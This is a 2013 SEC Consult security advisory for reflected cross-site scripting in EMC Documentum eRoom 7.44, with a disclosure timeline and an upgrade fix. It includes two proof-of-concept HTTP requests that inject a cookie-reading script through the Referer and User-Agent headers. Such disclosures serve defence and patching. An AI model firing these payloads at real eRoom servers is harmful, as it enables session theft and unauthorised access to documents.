SEC Consult Vulnerability Lab Security Advisory < 20131107-0 >
=======================================================================
              title: Multiple reflected cross-site scripting vulnerabilities
            product: EMC Documentum eRoom
 vulnerable version: 7.44 
      fixed version: 7.4.4 P11
                CVE: CVE-2013-3286
             impact: medium
           homepage: http://www.emc.com/products/detail/software2/eroom.htm
              found: 2012-08-20
                 by: V. Paulikas
		             SEC Consult Vulnerability Lab
		             https://www.sec-consult.com/
=======================================================================


Vendor description:
-------------------

"EMC Documentum eRoom is easy-to-use online team collaboration software that 
enables distributed teams to work together more efficiently. With Documentum 
eRoom, teams around the world can accelerate document collaboration and group 
activities, improve the development and delivery of products and services, 
optimize collaborative business processes, improve innovation, and streamline 
decision-making."

http://www.emc.com/products/detail/software2/eroom.htm


Vulnerability overview/description:
-----------------------------------

Documentum eRoom suffers from multiple reflected cross-site scripting 
vulnerabilities, which allow an attacker to steal other user's sessions, 
to impersonate other users and to gain unauthorized access to documents 
hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and 
gather all available documents.

There are many parameters which are not properly sanitized and thus are
vulnerable to XSS.


Proof of concept:
-----------------

1) The "Referer" header is not properly validated and is thus prone to reflected cross-site
scripting.

Request:
POST /eRoomASP/Connect.asp?Ctxt=&ERClickInMap=FALSE&command=btnDefault&SessionKey= HTTP/1.1
Host: localhost
Referer: localhost/eRoomxss"><script>alert(document.cookie)</script>

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=&ERWindowName=eRw1343558275&LoginName=asd&Password=asd

2) The "User-Agent" header is not properly validated and is thus prone to reflected cross-site
scripting. 

Request:
GET /eRoomtest/diagVariables.asp HTTP/1.1
User-Agent: <script>alert(document.cookie)</script>
Host: localhost

Other vulnerable header fields include "Connection" and "Accept-Language".


Vendor contact timeline:
------------------------
2012-10-09: Contacting vendor through security_alert@emc.com
2012-10-09: Vendor forwarded information to product team
2012-10-31: Vendor investigates reported issues
2013-07-16: Vendor will release the fixes of the issues with 7.4.4 SP1 in early Q2 2014
2013-11-13: Coordinated release of advisory


Solution:
---------

Upgrade to EMC Documentum eRoom version 7.4.4 P11.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF V. Paulikas / @2013